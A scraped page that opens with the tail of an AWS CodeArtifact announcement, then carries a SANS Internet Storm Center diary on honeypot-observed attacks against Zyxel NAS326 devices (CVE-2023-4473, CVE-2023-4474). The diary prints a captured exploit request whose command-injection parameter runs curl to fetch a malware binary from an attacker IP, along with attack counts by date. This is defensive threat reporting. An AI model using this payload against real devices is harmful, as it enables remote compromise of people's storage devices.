CodeArtifact for Ruby packages is available in all 13 Regions where CodeArtifact is available.

Now, go build your Ruby applications and upload your private packages to CodeArtifact!

— seb

Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474, (Tue, Apr 30th)

This post was originally published on this site

Yesterday, I talked about attacks against a relatively recent D-Link NAS vulnerability. Today, scanning my honeypot logs, I found an odd URL that I didn't recognize. The vulnerability is a bit older but turns out to be targeting yet another NAS.

The sample request:

POST /cmd,/ck6fup6/portal_main/pkg_init_cmd/register_main/setCookie HTTP/1.0
User-Agent: Baidu
Accept: */*
Content-Length: 73
Content-Type: application/x-www-form-urlencoded
Host: [redacted]

pkgname=myZyXELcloud-Agent&cmd=%3bcurl%2089.190.156.248/amanas2&content=1

The exploit is simple: attempt to download and execute the "amanas2" binary and execute it. Sadly, I was not able to retrieve the file. Virustotal does show the URL as malicious for a couple of anti-malware tools [1]

Oddly, I am seeing this pattern only the last couple days, even though the vulnerability and the PoC were disclosed last year [2]:

Date Count
April 27th 56
April 28th 1530
April 29th 899
April 30th 749

Based on our logs, only one IP address exploits the vulnerability: %%ip: 89.190.156.248%%. The IP started scanning a couple of days earlier for index pages and "jeecgFormDemoController.do, likely attempting to exploit a deserialization vulnerability in jeecgFormDemoController 

[1] https://www.virustotal.com/gui/url/ed0f3f39dce2cecca3cdc9e15099f0aa6cad3ea18f879beafe972ecd062a8229?nocache=1
[2] https://bugprove.com/knowledge-hub/cve-2023-4473-and-cve-2023-4474-authentication-bypass-and-multiple-blind-os-command-injection-vulnerabilities-in-zyxel-s-nas-326-devices/

 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.